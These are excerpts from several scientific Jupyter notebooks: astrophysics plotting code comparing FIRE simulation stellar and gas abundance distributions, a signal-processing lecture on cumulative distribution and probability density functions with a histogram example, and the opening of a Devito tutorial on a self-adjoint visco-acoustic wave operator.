data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, np.cumsum(hist1)/(1.0*np.sum(hist1)), where='post',lw=3,color='black') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, np.cumsum(hist2)/(1.0*np.sum(hist1)), where='post',lw=3,color='C0') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction') ksval = ks_2samp(hist1,hist2) ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[(0,0)],'C','H',data) plot_ax(ax[(0,1)],'N','H',data) plot_ax(ax[(0,2)],'O','H',data) plot_ax(ax[(0,3)],'Ne','H',data) plot_ax(ax[(0,4)],'Mg','H',data) plot_ax(ax[(1,0)],'Si','H',data) plot_ax(ax[(1,1)],'S','H',data) plot_ax(ax[(1,2)],'Ca','H',data) plot_ax(ax[(1,3)],'Fe','H',data) plot_ax(ax[(1,4)],'Mg','Fe',data,amin=-3,amax=3) for ax1 in ax: for ax2 in ax1: #ax2.set_ylim(0,1.0) ax2.semilogy() ax2.set_ylim(1.0E-4,1.0) ax2.set_xlim(-4,2) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') plt.minorticks_on() outname = simulation + '_cumulative_stellar_MDFs.png' fig.savefig(outname) # # Lets try and plot O / Fe vs Fe / H # for the fiducial fire stuff # elements y1e,y2e = "O","Fe" x1e,x2e = "Fe","H" # #y1, y2 = yield_model.elements.index(y1e), yield_model.elements.index(y2e) #x1, x2 = yield_model.elements.index(x1e), yield_model.elements.index(x2e) y1_vals = _get_abund(y1e,data) y2_vals = _get_abund(y2e,data) y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_age_abund(x1e,data) x2_vals = _get_age_abund(x2e,data) x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) fig, ax = plt.subplots() fig.set_size_inches(6,6) ax.scatter(y1y2, y1y2-x1x2, color = "black", s = 60, marker="o", label = "FIRE") ax.set_ylabel("FIRE - Age Tracer [" + y1e + "/" + y2e + "]") ax.set_xlabel("FIRE[" + x1e + "/" + x2e + "]") ax.legend(loc='best') ax.set_xlim(-5,1) #ax.set_ylim(ax.get_xlim()) ax.set_ylim(-10,10) #ax.plot([-100,100],[-100,100]) plt.minorticks_on() plt.tight_layout() diff = y1y2-x1x2 print(np.size(diff[np.abs(diff)>0.1])/ (1.0*np.size(diff))) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.05,0.20) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction', size = 30) ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' + str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: a.set_ylim(0,0.2) a.set_xlim(-4,2) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction of Stars') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.05,0.20) def plot_ax(ax, e1, e2, data,db=0.1,amin=-4,amax=3): bins, hist1 = MDF(e1,e2,data,amin,amax,age=False,dbin=db) ax.step(bins, hist1/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) #ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction', size = 30) ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' + str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: a.set_ylim(0,0.2) a.set_xlim(-4,2) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction of Stars') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDFs1.png' fig.savefig(outname) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) xy = (0.6,0.90) def plot_ax(ax, e1, e2, data,db=0.001,amin=0,amax=3): bins, hist1, stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=db,absval=True) ax.step(bins, np.cumsum(hist1)/(1.0*np.sum(hist1)), where='post',lw=3,color='black', label = 'Simulation Abundance') #bins, hist2 = MDF(e1,e2,data,amin,amax,age=True,dbin=db) #ax.step(bins, hist2/(1.0*np.sum(hist1)), where='post',lw=3,color='C0', label = 'Post-process') #ax.annotate('[' + e1 + '/'+ e2 + ']', xy=xy,xycoords='axes fraction', size = 30) #ksval = ks_2samp(hist1,hist2) #x1 = part['star'].prop('massfraction.' + str.lower(e1)).astype(np.double) #x2 = part['star'].prop('massfraction.' + str.lower(e2)).astype(np.double) #x = ca.abundance_ratio_array(e1, x1, e2, x2, input_type=input_type) #abund = x #print(e1,e2,np.min(x),np.mean(x),np.median(x),np.max(x)) #nbins = int((amax - amin)/db) #hist, bins = np.histogram(abund, bins = nbins, range = (amin,amax)) #hist2 = np.ones(np.size(hist)+1) #hist2[:-1] = hist #hist2[-1] = hist2[-2] #ax.step(bins,hist2/(1.0*np.sum(hist2)), where='post',lw=3,color='C1') #ax.annotate('ks_D = %0.3f \n - p = %.3f'%(ksval[0],ksval[1]),xy=(0.02,xy[1]-0.05),xycoords='axes fraction') return plot_ax(ax[0],'O','H',data) plot_ax(ax[1],'Fe','H',data) for a in ax: #a.set_ylim(0,0.2) a.set_xlim(0,1) a.set_xlabel('[X/H] [dex]') ax[0].set_ylabel('Fraction') plt.minorticks_on() ax[0].legend(loc='upper left') outname = 'O_Fe_stellar_MDF_diff.png' fig.savefig(outname) rc('text',usetex=False) rc('font',size=fsize) fig,ax = plt.subplots(1,2,sharey=True,sharex=True) fig.set_size_inches(12,6) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = 0.0, 3.0 dbin = 0.001 xy = (0.6,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,absval=True) ax.step(bins, np.cumsum(hist/(1.0*np.sum(hist))), where='post', lw = 3, color = 'C0') size2 = 20 yoff = 0.6 ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction',size=30) ax.annotate('Median = %0.4f dex'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1-yoff), xycoords = 'axes fraction', size = size2) #ax.annotate('IQR = %0.4f dex'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2-yoff), xycoords = 'axes fraction', size = size2) ax.annotate('f < 0.05 dex = %0.2f'%(stats['0.05dex']), xy=(xy[0]-0.32,xy[1]-0.2-yoff),xycoords='axes fraction', size = size2) return plot_panel(ax[0], 'O', 'H') plot_panel(ax[1], 'Fe', 'H') for ax2 in ax: ax2.set_ylim(1.0E-2,1.0) #ax2.semilogy() ax2.semilogx() ax[0].set_ylabel('Fraction of Stars') #ax[1].set_ylabel('Fraction') for i in np.arange(2): ax[i].set_xlabel('Abundance Difference [dex]') ax[i].set_xticks([0.001,0.01,0.1,1.0]) ax[i].set_xticklabels(["0.001","0.01","0.1","1.0"]) ax[i].yaxis.set_minor_locator(AutoMinorLocator()) outname = 'O_Fe_cumulative_stellar_MDFs_offset.png' fig.savefig(outname) pp = yt.PhasePlot(ds, 'PartType0_O_actual_mass', 'PartType0_O_mass', ('PartType0','particle_mass'), weight_field=None) pp.set_xlim(1.0E-3,10.) pp.set_ylim(1.0E-3,10.) pp.set_log('PartType0_O_actual_mass',True) pp.set_log('PartType0_O_mass',True) x1e = 'O' x2e = 'H' amin,amax = -4,1 fig,ax = plt.subplots(2,5,sharey=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0) #'C', 'N', 'O', 'Ne', 'Mg', 'Si', 'S', 'Ca', 'Fe bins,hist = MDF('C','H',data,amin,amax,age=False,ptype='gas') ax[(0,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('C','H',data,amin,amax,age=True,ptype='gas') ax[(0,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,0)].set_xlabel('[C/H]') bins,hist = MDF('N','H',data,amin,amax,age=False,ptype='gas') ax[(0,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('N','H',data,amin,amax,age=True,ptype='gas') ax[(0,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,1)].set_xlabel('[N/H]') bins,hist = MDF('O','H',data,amin,amax,age=False,ptype='gas') ax[(0,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('O','H',data,amin,amax,age=True,ptype='gas') ax[(0,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,2)].set_xlabel('[O/H]') bins,hist = MDF('Ne','H',data,amin,amax,age=False,ptype='gas') ax[(0,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Ne','H',data,amin,amax,age=True,ptype='gas') ax[(0,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,3)].set_xlabel('[Ne/H]') bins,hist = MDF('Mg','H',data,amin,amax,age=False,ptype='gas') ax[(0,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Mg','H',data,amin,amax,age=True,ptype='gas') ax[(0,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(0,4)].set_xlabel('[Mg/H]') bins,hist = MDF('Si','H',data,amin,amax,age=False,ptype='gas') ax[(1,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Si','H',data,amin,amax,age=True,ptype='gas') ax[(1,0)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,0)].set_xlabel('[Si/H]') bins,hist = MDF('S','H',data,amin,amax,age=False,ptype='gas') ax[(1,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('S','H',data,amin,amax,age=True,ptype='gas') ax[(1,1)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,1)].set_xlabel('[S/H]') bins,hist = MDF('Ca','H',data,amin,amax,age=False,ptype='gas') ax[(1,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Ca','H',data,amin,amax,age=True,ptype='gas') ax[(1,2)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,2)].set_xlabel('[Si/H]') bins,hist = MDF('Fe','H',data,amin,amax,age=False,ptype='gas') ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') bins,hist = MDF('Fe','H',data,amin,amax,age=True,ptype='gas') ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax[(1,3)].set_xlabel('[Fe/H]') #bins,hist = MDF('O','Fe',data,-1,1,age=False,ptype='gas') #ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') #bins,hist = MDF('O','Fe',data,-1,1,age=True,ptype='gas') #ax[(1,3)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') #ax[(1,3)].set_xlabel('[O/Fe]') #bins,hist = MDF('N','O',data,-1,1,age=False,ptype='gas') #ax[(1,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'black') #bins,hist = MDF('N','O',data,-1,1,age=True,ptype='gas') #ax[(1,4)].step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') #ax[(1,4)].set_xlabel('[N/O]') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,1.0) ax2.set_xlim(-2.5,2.5) outname = simulation + '_gas_MDFs.png' fig.savefig(outname) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = -.25,0.25 dbin = 0.005 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin) ax.step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') ax.annotate('f > 0.02 dex = %0.2f'%(1.0-stats['0.02dex']), xy=(xy[0]-0.32,xy[1]-0.3),xycoords='axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.3) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + '_stellar_MDFs_offset.png' fig.savefig(outname) print("%8s %8s %8s %8s %8s %8s %8s %8s %8s"%('Ratio','Median','IQR','Q1','Q3','f<0.05dex','f<0.02dex','f<0.01dex','f<0.005dex')) i = 0 med = np.zeros((np.size(yield_model.elements)-2)*4) iqr = np.zeros(np.size(med)) q1 = np.zeros(np.size(med)) q3 = np.zeros(np.size(med)) n01 = np.zeros(np.size(med)) n02 = np.zeros(np.size(med)) n005 = np.zeros(np.size(med)) n05 = np.zeros(np.size(med)) n = [None]*np.size(med) d = [None]*np.size(med) amin,amax = -5,2 dbin = 0.05 for denom in ['H','Fe','Mg','O']: for numerator in yield_model.elements: if numerator == 'Total' or numerator == 'He': continue bins,hist,stats = MDF(numerator,denom,data,amin,amax,diff=True,dbin=dbin,absval=True) med[i] = stats['median'] iqr[i] = stats['IQR'] q1[i] = stats['Q1'] q3[i] = stats['Q3'] n[i] = numerator d[i] = denom n01[i] = stats['0.01dex'] n02[i] = stats['0.02dex'] n005[i] = stats['0.005dex'] n05[i] = stats['0.05dex'] print('[%2s/%2s]: %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f'%(n[i],d[i],med[i],iqr[i],q1[i],q3[i], n05[i], n02[i], n01[i], n005[i])) i = i + 1 fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = 0.0, 3.0 dbin = 0.001 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,absval=True) ax.step(bins, np.cumsum(hist/(1.0*np.sum(hist))), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') ax.annotate('f < 0.05 dex = %0.2f'%(stats['0.05dex']), xy=(xy[0]-0.5,xy[1]-0.3),xycoords='axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: #ax2.set_ylim(1.0E-2,1.0) #ax2.semilogy() ax2.semilogx() ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + '_cumulative_stellar_MDFs_offset.png' fig.savefig(outname) fig,ax=plt.subplots() fig.set_size_inches(6,6) ax.scatter(np.arange(np.size(med)), med) ax.set_ylabel('Median Offset (dex)') t= ax.set_xticks(np.arange(np.size(med))) rat = [None]*len(n) for i in np.arange(len(n)): rat[i] = '[%2s/%2s]'%(n[i],d[i]) t=ax.set_xticklabels(rat, fontsize=8) plt.minorticks_on() #fig.savefig('constFB_offset_fiducial.png') print(n) fig,ax = plt.subplots(2,5,sharey=True,sharex=True) fig.set_size_inches(16,8) fig.subplots_adjust(wspace=0,hspace=0) amin,amax = -0.26,0.26 dbin = 0.02 xy = (0.8,0.90) def plot_panel(ax,e1,e2): bins,hist,stats = MDF(e1,e2,data,amin,amax,diff=True,dbin=dbin,ptype='gas') ax.step(bins, hist/(1.0*np.sum(hist)), where='post', lw = 3, color = 'C0') ax.annotate('[' + e1 + '/' + e2 + ']', xy=xy, xycoords = 'axes fraction') ax.annotate('Median = %0.4f'%stats['median'], xy = (xy[0]-0.32,xy[1]-0.1), xycoords = 'axes fraction') ax.annotate('IQR = %0.4f'%stats['IQR'], xy = (xy[0]-0.32,xy[1]-0.2), xycoords = 'axes fraction') return plot_panel(ax[(0,0)], 'C', 'H') plot_panel(ax[(0,1)], 'N', 'H') plot_panel(ax[(0,2)], 'O', 'H') plot_panel(ax[(0,3)], 'Ne', 'H') plot_panel(ax[(0,4)], 'Mg', 'H') plot_panel(ax[(1,0)], 'Si', 'H') plot_panel(ax[(1,1)], 'S', 'H') plot_panel(ax[(1,2)], 'Ca', 'H') plot_panel(ax[(1,3)], 'Fe', 'H') plot_panel(ax[(1,4)], 'Mg', 'Fe') for ax1 in ax: for ax2 in ax1: ax2.set_ylim(0,0.5) ax[(0,0)].set_ylabel('Fraction') ax[(1,0)].set_ylabel('Fraction') for i in np.arange(5): ax[(1,i)].set_xlabel('FIRE - Age Abundance [dex]') outname = simulation + '_gas_MDFs_offset.png' fig.savefig(outname) np.logspace(1,2,4) ```
github_jupyter
# Random Signals *This jupyter notebook is part of a [collection of notebooks](../index.ipynb) on various topics of Digital Signal Processing. Please direct questions and suggestions to [Sascha.Spors@uni-rostock.de](mailto:Sascha.Spors@uni-rostock.de).* ## Cumulative Distribution Functions A random process can be characterized by the statistical properties of its amplitude values. [Cumulative distribution functions](https://en.wikipedia.org/wiki/Cumulative_distribution_function) (CDFs) are one possibility to do so. ### Univariate Cumulative Distribution Function The univariate CDF $P_x(\theta, k)$ of a continuous-amplitude real-valued random signal $x[k]$ is defined as \begin{equation} P_x(\theta, k) := \Pr \{ x[k] \leq \theta\} \end{equation} where $\Pr \{ \cdot \}$ denotes the probability that the given condition holds. The univariate CDF quantifies the probability that for the entire ensemble and for a fixed time index $k$ the amplitude $x[k]$ is smaller or equal to $\theta$. The term '*univariate*' reflects the fact that only one random process is considered. The CDF shows the following properties which can be concluded directly from its definition \begin{equation} \lim_{\theta \to -\infty} P_x(\theta, k) = 0 \end{equation} and \begin{equation} \lim_{\theta \to \infty} P_x(\theta, k) = 1 \end{equation} The former property results from the fact that all amplitude values $x[k]$ are larger than $- \infty$, the latter from the fact that all amplitude values lie within $- \infty$ and $\infty$. The univariate CDF $P_x(\theta, k)$ is furthermore a non-decreasing function. The probability that $\theta_1 < x[k] \leq \theta_2$ is given as \begin{equation} \Pr \{\theta_1 < x[k] \leq \theta_2\} = P_x(\theta_2, k) - P_x(\theta_1, k) \end{equation} Hence, the probability that a continuous-amplitude random signal takes a specific value $x[k]=\theta$ is zero when calculated by means of the CDF. This motivates the definition of probability density functions introduced later. ### Bivariate Cumulative Distribution Function The statistical dependencies between two signals are frequently of interest in statistical signal processing. The bivariate or joint CDF $P_{xy}(\theta_x, \theta_y, k_x, k_y)$ of two continuous-amplitude real-valued random signals $x[k]$ and $y[k]$ is defined as \begin{equation} P_{xy}(\theta_x, \theta_y, k_x, k_y) := \Pr \{ x[k_x] \leq \theta_x \wedge y[k_y] \leq \theta_y \} \end{equation} The joint CDF quantifies the probability for the entire ensemble of sample functions that for a fixed $k_x$ the amplitude value $x[k_x]$ is smaller or equal to $\theta_x$ and that for a fixed $k_y$ the amplitude value $y[k_y]$ is smaller or equal to $\theta_y$. The term '*bivariate*' reflects the fact that two random processes are considered. The bivariate CDF can also be used to characterize the statistical properties of one random signal $x[k]$ at two different time-instants $k_x$ and $k_y$ by setting $y[k] = x[k]$ \begin{equation} P_{xx}(\theta_1, \theta_2, k_1, k_2) := \Pr \{ x[k_1] \leq \theta_1 \wedge y[k_2] \leq \theta_2 \} \end{equation} The definition of the bivariate CDF can be extended straightforward to the case of more than two random variables. The resulting CDF is termed as multivariate CDF. ## Probability Density Functions [Probability density functions](https://en.wikipedia.org/wiki/Probability_density_function) (PDFs) describe the probability for one or multiple random signals to take on a specific value. Again the univariate case is discussed first. ### Univariate Probability Density Function The univariate PDF $p_x(\theta, k)$ of a continuous-amplitude real-valued random signal $x[k]$ is defined as the derivative of the univariate CDF \begin{equation} p_x(\theta, k) = \frac{\partial}{\partial \theta} P_x(\theta, k) \end{equation} Due to the properties of the CDF and the definition of the PDF, it shows the following properties \begin{equation} p_x(\theta, k) \geq 0 \end{equation} and \begin{equation} \int\limits_{-\infty}^{\infty} p_x(\theta, k) \, \mathrm{d}\theta = P_x(\infty, k) = 1 \end{equation} The univariate PDF has only positive values and the area below the PDF is equal to one. Due to the definition of the PDF as derivative of the CDF, the CDF can be computed from the PDF by integration \begin{equation} P_x(\theta, k) = \int\limits_{-\infty}^{\theta} p_x(\theta, k) \, \mathrm{d}\theta \end{equation} #### Example - Estimate of an univariate PDF by the histogram In the process of calculating a [histogram](https://en.wikipedia.org/wiki/Histogram), the entire range of amplitude values of a random signal is split into a series of intervals (bins). For a given random signal the number of samples is counted which fall into one of these intervals. This is repeated for all intervals. The counts are finally normalized with respect to the total number of samples. This process constitutes a numerical estimation of the PDF of a random process. In the following example the histogram of an ensemble of random signals is computed for each time index $k$. The CDF is computed by taking the cumulative sum over the histogram bins. This constitutes a numerical approximation of above integral \begin{equation} \int\limits_{-\infty}^{\theta} p_x(\theta, k) \approx \sum_{i=0}^{N} p_x(\theta_i, k) \, \Delta\theta_i \end{equation} where $p_x(\theta_i, k)$ denotes the $i$-th bin of the PDF and $\Delta\theta_i$ its width. ``` %matplotlib inline import numpy as np import matplotlib.pyplot as plt K = 32 # number of temporal samples N = 10000 # number of sample functions bins = 100 # number of bins for the histogram # draw sample functions from a random process np.random.seed(2) x = np.random.normal(size=(N, K)) x += np.tile(np.cos(2*np.pi/K*np.arange(K)), [N, 1]) # compute the histogram px = np.zeros((bins, K)) for k in range(K): px[:, k], edges = np.histogram(x[:, k], bins=bins, range=(-4,4), density=True) # compute the CDF Px = np.cumsum(px, axis=0) * 8/bins # plot the PDF plt.figure(figsize=(10,6)) plt.pcolor(np.arange(K), edges, px) plt.title(r'Estimated PDF $\hat{p}_x(\theta, k)$') plt.xlabel(r'$k$') plt.ylabel(r'$\theta$') plt.colorbar() plt.autoscale(tight=True) # plot the CDF plt.figure(figsize=(10,6)) plt.pcolor(np.arange(K), edges, Px, vmin=0, vmax=1) plt.title(r'Estimated CDF $\hat{P}_x(\theta, k)$') plt.xlabel(r'$k$') plt.ylabel(r'$\theta$') plt.colorbar() plt.autoscale(tight=True) ``` **Exercise** * Change the number of sample functions `N` or/and the number of `bins` and rerun the examples. What changes? Why? In numerical simulations of random processes only a finite number of sample functions and temporal samples can be considered. This holds also for the number of intervals (bins) used for the histogram. As a result, numerical approximations of the CDF/PDF will be subject to statistical uncertainties that typically will become smaller if the number of sample functions `N` is increased. ### Bivariate Probability Density Function The bivariate or joint PDF $p_{xy}(\theta_x, \theta_y, k_x, k_y)$ of two continuous-amplitude real-valued random signals $x[k]$ and $y[k]$ is defined as \begin{equation} p_{xy}(\theta_x, \theta_y, k_x, k_y) := \frac{\partial^2}{\partial \theta_x \partial \theta_y} P_{xy}(\theta_x, \theta_y, k_x, k_y) \end{equation} The bivariate PDF quantifies the joint probability that $x[k]$ takes the value $\theta_x$ and that $y[k]$ takes the value $\theta_y$ for the entire ensemble of sample functions. If $x[k] = y[k]$ the bivariate PDF $p_{xx}(\theta_1, \theta_2, k_1, k_2)$ describes the probability that the random signal $x[k]$ takes the value $\theta_1$ at time instance $k_1$ and the value $\theta_2$ at time instance $k_2$. Hence, $p_{xx}(\theta_1, \theta_2, k_1, k_2)$ provides insights into the temporal dependencies of a random signal $x[k]$. This notebook is provided as [Open Educational Resource](https://en.wikipedia.org/wiki/Open_educational_resources). Feel free to use the notebook for your own purposes. The text is licensed under [Creative Commons Attribution 4.0](https://creativecommons.org/licenses/by/4.0/), the code of the IPython examples under the [MIT license](https://opensource.org/licenses/MIT). Please attribute the work as follows: *Sascha Spors, Digital Signal Processing - Lecture notes featuring computational examples, 2016*.
github_jupyter
# Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator <br>-- Nonlinear Ops -- ## This operator is contributed by Chevron Energy Technology Company (2020) This operator is based on simplfications of the systems presented in: <br>**Self-adjoint, energy-conserving second-order pseudoacoustic systems for VTI and TTI media for reverse time migration and full-waveform inversion** (2016) <br>Kenneth Bube, John Washbourne, Raymond Ergas, and Tamas Nemeth <br>SEG Technical Program Expanded Abstracts <br>https://library.seg.org/doi/10.1190/segam2016-13878451.1 ## Introduction The goal of this tutorial set is to generate and prove correctness of modeling and inversion capability in Devito for variable density visco- acoustics using an energy conserving form of the wave equation. We describe how the linearization of the energy conserving *self adjoint* system with respect to modeling parameters allows using the same modeling system for all nonlinear and linearized forward and adjoint finite difference evolutions. There are three notebooks in this series: ##### 1. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Nonlinear Ops - Implement the nonlinear modeling operations. - [sa_01_iso_implementation1.ipynb](sa_01_iso_implementation1.ipynb) ##### 2. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Linearized Ops - Implement the linearized (Jacobian) ```forward``` and ```adjoint``` modeling operations. - [sa_02_iso_implementation2.ipynb](sa_02_iso_implementation2.ipynb) ##### 3. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Correctness Testing - Tests the correctness of the implemented operators. - [sa_03_iso_correctness.ipynb](sa_03_iso_correctness.ipynb) There are similar series of notebooks implementing and testing operators for VTI and TTI anisotropy ([README.md](README.md)). Below we introduce the *self adjoint* form of the scalar isotropic variable density visco- acoustic wave equation with a simple form of dissipation only Q attenuation. This dissipation only (no dispersion) attenuation term $\left (\frac{\displaystyle \omega}{Q}\ \partial_t\ u \right)$ is an approximation of a [Maxwell Body](https://en.wikipedia.org/wiki/Maxwell_material) -- that is to say viscoelasticity approximated with a spring and dashpot in series. In practice this approach for attenuating outgoing waves is very similar to the Cerjan style damping in absorbing boundaries used elsewhere in Devito ([References](#nl_refs)). The derivation of the 